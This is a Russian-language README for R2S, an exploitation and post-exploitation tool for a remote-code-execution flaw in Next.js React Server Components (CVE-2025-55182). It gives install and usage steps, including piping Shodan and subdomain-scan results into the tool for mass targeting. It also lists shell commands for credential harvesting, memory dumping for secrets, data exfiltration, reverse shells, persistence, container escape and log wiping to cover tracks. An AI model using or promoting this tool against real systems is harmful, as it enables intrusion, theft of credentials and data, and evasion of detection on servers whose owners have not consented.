R2S — это комплексный фреймворк для эксплуатации и пост-эксплуатации, нацеленный на уязвимость React Server Components в Next.js (CVE-2025-55182). Он предоставляет интерактивную оболочку с расширенными возможностями для тестирования на проникновение, включая передачу файлов, закрепление в системе, перечисление ресурсов, проверки повышения привилегий и многое другое.
Продвинутый фреймворк пост-эксплуатации для RCE в React Server Components Next.js
Возможности • Установка • Использование • Команды • Примеры
R2S — это комплексный фреймворк эксплуатации и пост-эксплуатации, нацеленный на уязвимость React Server Components Next.js (CVE-2025-55182). Он предоставляет интерактивную оболочку с расширенными возможностями для пентестинга, включая передачу файлов, закрепление, разведку, проверки на повышение привилегий и многое другое.
.env и конфигурационные файлы# Python 3.6 или выше
python3 --version
# Установка зависимостей
pip3 install requests urllib3
# Клонируйте или скачайте инструмент
cd r2s-main
# Сделайте исполняемым (опционально)
chmod +x r2s_enhanced.py
# Запустите инструмент
python3 r2s_enhanced.py -h
python3 r2s_enhanced.py [ОПЦИИ]
| Параметр | Описание | По умолчанию |
|---|---|---|
-u, --url | URL одной цели | - |
-l, --list | Файл со списком URL | - |
-c, --cmd | Начальная команда для выполнения | id |
-t, --threads | Количество потоков сканирования | 30 |
-p, --proxy | HTTP-прокси (например, http://127.0.0.1:8080) | - |
-v, --verbose | Включить подробный вывод | False |
--http-port | Порт HTTP-сервера для передачи файлов | 8000 |
python3 r2s_enhanced.py -u http://target.com
python3 r2s_enhanced.py -l targets.txt -t 50
cat targets.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d example.com | httpx | python3 r2s_enhanced.py
Получив доступ RCE, вы войдёте в интерактивную оболочку со следующими командами:
upload <local_file> <remote_path> # Загрузить файл на цель
download <remote_file> <local_path> # Скачать файл с цели
cd <directory> # Сменить рабочую директорию
pwd # Показать текущую директорию
enum # Полная разведка системы
privesc # Проверки на повышение привилегий
harvest # Сбор учётных данных
portscan <ip> # Сканирование портов внутренней сети
memdump [pid] # Дамп памяти процесса для поиска секретов
lateral # Возможности горизонтального перемещения
escape # Векторы побега из контейнера
exfil [type] # Эксфильтрация данных (env/config/keys/db/logs/all)
reverse <lhost> <lport> # Попробовать несколько полезных нагрузок реверс-шелла
persist # Добавить базовое закрепление
advpersist # Добавить расширенное закрепление
stealth # Очистить логи и заметать следы
save # Сохранить текущую сессию
help, ? # Показать справку
exit, quit # Выйти из интерактивной оболочки
Выполняйте любые команды оболочки напрямую:
whoami
id
uname -a
ps aux
netstat -tulpn
cat /etc/passwd
$ python3 r2s_enhanced.py -u http://vulnerable-app.com